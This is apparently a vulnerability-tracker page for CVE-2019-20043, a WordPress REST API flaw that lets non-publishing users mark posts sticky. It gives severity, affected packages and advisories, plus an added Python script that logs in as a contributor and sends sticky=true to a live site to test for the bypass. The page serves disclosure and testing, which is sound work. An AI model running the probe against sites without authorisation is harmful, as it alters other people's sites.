CVE-2019-20043: Improper Privilege Management in WordPress

Severity
4.3 MEDIUM (NVD)
EPSS
1.2%
top 21.33%
CISA KEV
Not in KEV
Exploit
No known exploits
Timeline
Published: Dec 27
Latest update: May 24

Description

In wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php in WordPress 3.7 to 5.3.0, authenticated users who lack the capability to publish a post can still mark posts as sticky or unsticky via the REST API. The Contributor role, for example, can create and edit its own drafts but cannot publish; the endpoint nevertheless honoured a sticky flag sent by a contributor, so a post-level publishing restriction could be bypassed for that one attribute. This was patched in WordPress 5.3.1, with the fix backported as a minor release to every earlier branch from 3.7 to 5.3 (the REST posts endpoints themselves only shipped in core with 4.7, but the security release covered all supported branches).
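As an added check, not code from WordPress or from any advisory listed on this page, the Python script below probes a site for the behaviour described above: it authenticates as a low-privilege user, sends sticky=true either when creating a draft or when updating an existing post, and classifies the reply. The site URL, credentials, the use of HTTP Basic authentication on the REST API (via the Basic Auth plugin or Application Passwords on 5.6+), and the assumption that the create path carries the same missing check as the update path are all assumptions; the sample replies in the `__main__` block are constructed, not captured from a real site.

```python
"""Probe for CVE-2019-20043: can a user who cannot publish still set the
sticky flag through the WordPress REST API?

Added illustration; not code from the WordPress project or from any advisory
on this page. Assumptions (none are stated on this page):
  * The site accepts HTTP Basic authentication on the REST API, for example
    through the Basic Auth plugin or WordPress Application Passwords (5.6+);
    cookie+nonce authentication would behave the same but is not implemented.
  * The wp/v2/posts route is exposed and the test account has the Contributor
    role, which may create its own drafts but must not be able to make them
    sticky.
"""
import base64
import json
import urllib.error
import urllib.request
from typing import Optional, Tuple

VULNERABLE = "vulnerable"          # server honoured sticky=true for a non-publisher
NOT_VULNERABLE = "not-vulnerable"  # server refused or silently dropped the flag
INCONCLUSIVE = "inconclusive"      # failed for an unrelated reason (network, 5xx)


def classify_sticky_response(status: int, body: dict) -> str:
    """Interpret the JSON reply to a create/update request that sent sticky=true.

    Bypass proven: 2xx and the returned post object carries "sticky": true.
    Check enforced: 401/403 (a capability check refused the request) or a 2xx
    whose post object reports "sticky": false (the flag was ignored).
    Anything else (404 route removed, 5xx, empty body) is inconclusive.
    """
    if status in (401, 403):
        return NOT_VULNERABLE
    if 200 <= status < 300:
        return VULNERABLE if body.get("sticky") is True else NOT_VULNERABLE
    return INCONCLUSIVE


def _rest_request(url: str, username: str, password: str, payload: dict,
                  timeout: float) -> Tuple[int, dict]:
    """POST a JSON payload with Basic auth; return (HTTP status, parsed body)."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = urllib.request.Request(
        url,
        data=json.dumps(payload).encode(),
        method="POST",  # the WP REST API accepts POST for both create and update
        headers={"Authorization": "Basic " + token,
                 "Content-Type": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, json.loads(resp.read().decode() or "{}")
    except urllib.error.HTTPError as err:
        try:
            return err.code, json.loads(err.read().decode() or "{}")
        except ValueError:
            return err.code, {}


def probe(site: str, username: str, password: str,
          post_id: Optional[int] = None, timeout: float = 10.0) -> str:
    """Run the probe against a live site and classify the outcome.

    Without post_id: create a new draft with sticky=true (create path; assumed
    here to share the missing check). With post_id: send sticky=true for an
    existing post the user may edit, e.g. one of the contributor's own drafts
    (update path, the case the advisory text describes).
    """
    base = site.rstrip("/") + "/wp-json/wp/v2/posts"
    if post_id is None:
        url = base
        payload = {"title": "CVE-2019-20043 probe", "content": "safe to delete",
                   "status": "draft", "sticky": True}
    else:
        url = f"{base}/{post_id}"
        payload = {"sticky": True}
    try:
        status, body = _rest_request(url, username, password, payload, timeout)
    except (urllib.error.URLError, ValueError, OSError):
        return INCONCLUSIVE
    return classify_sticky_response(status, body)


if __name__ == "__main__":
    # Constructed replies (not captured from a real site) showing how each
    # shape is classified. Against a site you are authorised to test, run e.g.
    # probe("https://example.test", "contributor", "password", post_id=42).
    for status, body in [(201, {"id": 42, "status": "draft", "sticky": True}),
                         (403, {"code": "rest_forbidden"}),
                         (201, {"id": 43, "status": "draft", "sticky": False}),
                         (500, {})]:
        print(status, classify_sticky_response(status, body))
```

The create-path probe leaves a draft behind on a vulnerable site; delete it afterwards. A result of "not-vulnerable" only means this one attribute is guarded; it says nothing about the rest of the endpoint's authorisation logic.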

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (Exploitability: 2.8 | Impact: 1.4)

Affected Packages (3 packages)

Debian: debian/wordpress < 5.3.2+dfsg1-1 (bookworm)
NVD: wordpress/wordpress >= 3.7, < 5.3.1
Debian: wordpress/wordpress < 5.3.2+dfsg1-1+3

Also affects: Debian Linux 10.0, 9.0

Patches

🔴 Vulnerability Details (2)

GHSA: GHSA-ppxh-5qq2-77g8: WordPress before 5... (2022-05-24)
OSV: CVE-2019-20043: In wp-includes/rest-api/endpoints/class-wp-rest-posts-controller... (2019-12-27)

📋 Vendor Advisories (1)

Debian: CVE-2019-20043: wordpress - In wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php in WordP... (2019)

💬 Community (3)

Bugzilla: CVE-2019-20043 wordpress: authenticated users who do not have the rights to publish a post are able to mark posts as sticky or unsticky via the REST API (2020-01-21)
Bugzilla: CVE-2019-20043 wordpress: authenticated users who do not have the rights to publish a post are able to mark posts as sticky or unsticky via the REST API [epel-7] (2020-01-21)
Bugzilla: CVE-2019-20043 wordpress: authenticated users who do not have the rights to publish a post are able to mark posts as sticky or unsticky via the REST API [epel-6] (2020-01-21)